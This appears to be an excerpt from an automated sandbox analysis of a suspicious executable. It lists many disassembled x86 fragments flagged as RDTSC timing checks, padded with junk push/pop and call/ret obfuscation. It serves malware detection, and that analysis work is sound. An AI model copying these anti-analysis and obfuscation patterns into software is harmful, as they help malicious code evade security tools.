Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81277 second address: C812E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F3780CDC710h 0x00000011 pop eax 0x00000012 sub dword ptr [ebp+122D1FEDh], ebx 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F3780CDC708h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov edi, edx 0x00000036 mov dword ptr [ebp+122D57CAh], ecx 0x0000003c push 00000000h 0x0000003e jl 00007F3780CDC70Bh 0x00000044 adc si, ADF8h 0x00000049 push 00000003h 0x0000004b sbb ch, 00000011h 0x0000004e push BF54C58Bh 0x00000053 pushad 0x00000054 push ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C814A5 second address: C814A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C814A9 second address: C814AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8166D second address: C8169D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jns 00007F3780D2BA6Ch 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3780D2BA6Fh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8169D second address: C816F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F3780CDC712h 0x0000000e jnp 00007F3780CDC70Ch 0x00000014 lea ebx, dword ptr [ebp+124530B5h] 0x0000001a mov cx, bx 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 js 00007F3780CDC706h 0x00000028 popad 0x00000029 jmp 00007F3780CDC719h 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 ja 00007F3780CDC708h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1497 second address: CA149F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA149F second address: CA14AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA14AA second address: CA14B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA14B0 second address: CA14B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9F595 second address: C9F59A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FB32 second address: C9FB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3780CDC706h 0x0000000a je 00007F3780CDC706h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FCDF second address: C9FCFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F3780D2BA6Eh 0x0000000c pop ebx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA02BC second address: CA02CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F3780CDC706h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA02CD second address: CA02D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0408 second address: CA041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3780CDC706h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA041A second address: CA0422 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0BB3 second address: CA0BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0BB9 second address: CA0BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3780D2BA73h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0BD1 second address: CA0BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0ED9 second address: CA0EDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0EDF second address: CA0EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0EE5 second address: CA0EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3780D2BA75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA105F second address: CA1077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC714h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1343 second address: CA1347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3727 second address: CA372B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA372B second address: CA375D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3780D2BA73h 0x0000000d popad 0x0000000e push edx 0x0000000f jmp 00007F3780D2BA71h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA375D second address: CA3761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA7D33 second address: CA7D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA7D37 second address: CA7D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6664 second address: CA6668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6668 second address: CA667E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F3780CDC70Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA7EF4 second address: CA7EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA8035 second address: CA8043 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACFE1 second address: CACFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACFE5 second address: CAD016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC713h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F3780CDC713h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD016 second address: CAD01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD27B second address: CAD27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD67A second address: CAD6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jne 00007F3780D2BA7Bh 0x00000010 pushad 0x00000011 jmp 00007F3780D2BA6Ah 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3780D2BA76h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD832 second address: CAD838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD838 second address: CAD83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF44F second address: CAF453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF453 second address: CAF459 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF459 second address: CAF45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF553 second address: CAF5A1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3780D2BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F3780D2BA73h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jno 00007F3780D2BA78h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F3780D2BA6Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF5A1 second address: CAF5AB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF90B second address: CAF90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFA3F second address: CAFA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F3780CDC706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFB0D second address: CAFB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F3780D2BA66h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFB1D second address: CAFB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFBE7 second address: CAFBEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFBEB second address: CAFBF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0279 second address: CB02B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d push edx 0x0000000e jns 00007F3780D2BA78h 0x00000014 pop esi 0x00000015 nop 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB02B3 second address: CB02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3780CDC719h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB02D8 second address: CB02DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB033E second address: CB0357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB043A second address: CB0455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F3780D2BA66h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0455 second address: CB045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3780CDC706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB045F second address: CB0463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1649 second address: CB164D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB164D second address: CB16EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F3780D2BA68h 0x0000000f popad 0x00000010 push eax 0x00000011 jo 00007F3780D2BA78h 0x00000017 jmp 00007F3780D2BA72h 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F3780D2BA68h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 jmp 00007F3780D2BA6Dh 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F3780D2BA68h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 push 00000000h 0x0000005a mov dword ptr [ebp+122D243Ah], edi 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F3780D2BA6Ah 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB16EA second address: CB16F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2782 second address: CB2802 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3780D2BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F3780D2BA68h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 sbb si, B23Bh 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F3780D2BA68h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a call 00007F3780D2BA79h 0x0000004f mov edi, dword ptr [ebp+122D3817h] 0x00000055 pop esi 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2802 second address: CB2807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1F9A second address: CB1FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2F7B second address: CB2F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3A9D second address: CB3AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3D84 second address: CB3DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3780CDC70Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3780CDC70Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3AA1 second address: CB3AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3AA7 second address: CB3AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3780CDC706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3AB1 second address: CB3AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3AB5 second address: CB3AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F3780CDC710h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5A43 second address: CB5A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5CC2 second address: CB5CDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC718h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5A47 second address: CB5A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5CDE second address: CB5D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC716h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or edi, 1104775Dh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F3780CDC708h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D1DE0h], ebx 0x00000034 mov di, si 0x00000037 push 00000000h 0x00000039 jmp 00007F3780CDC70Fh 0x0000003e xchg eax, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F3780CDC713h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5D57 second address: CB5D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7A7A second address: CB7A8E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F3780CDC70Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA43E second address: CBA4DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D1A45h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F3780D2BA68h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e call 00007F3780D2BA70h 0x00000033 cld 0x00000034 pop ebx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F3780D2BA68h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 movsx ebx, cx 0x00000054 push eax 0x00000055 pushad 0x00000056 jmp 00007F3780D2BA79h 0x0000005b push eax 0x0000005c push edx 0x0000005d je 00007F3780D2BA66h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBB2E1 second address: CBB2E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBB2E5 second address: CBB30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a and di, D181h 0x0000000f push 00000000h 0x00000011 jg 00007F3780D2BA6Ch 0x00000017 mov dword ptr [ebp+122D57CAh], edi 0x0000001d push 00000000h 0x0000001f cld 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA5E8 second address: CBA674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jg 00007F3780CDC706h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 nop 0x00000015 mov di, ax 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov ebx, dword ptr [ebp+122D1910h] 0x00000025 mov bh, E7h 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e xor dword ptr [ebp+1245AF4Fh], ecx 0x00000034 mov eax, dword ptr [ebp+122D0B29h] 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F3780CDC708h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000016h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push esi 0x00000059 call 00007F3780CDC708h 0x0000005e pop esi 0x0000005f mov dword ptr [esp+04h], esi 0x00000063 add dword ptr [esp+04h], 0000001Ch 0x0000006b inc esi 0x0000006c push esi 0x0000006d ret 0x0000006e pop esi 0x0000006f ret 0x00000070 cld 0x00000071 nop 0x00000072 push edi 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 pop eax 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBB30B second address: CBB318 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3780D2BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
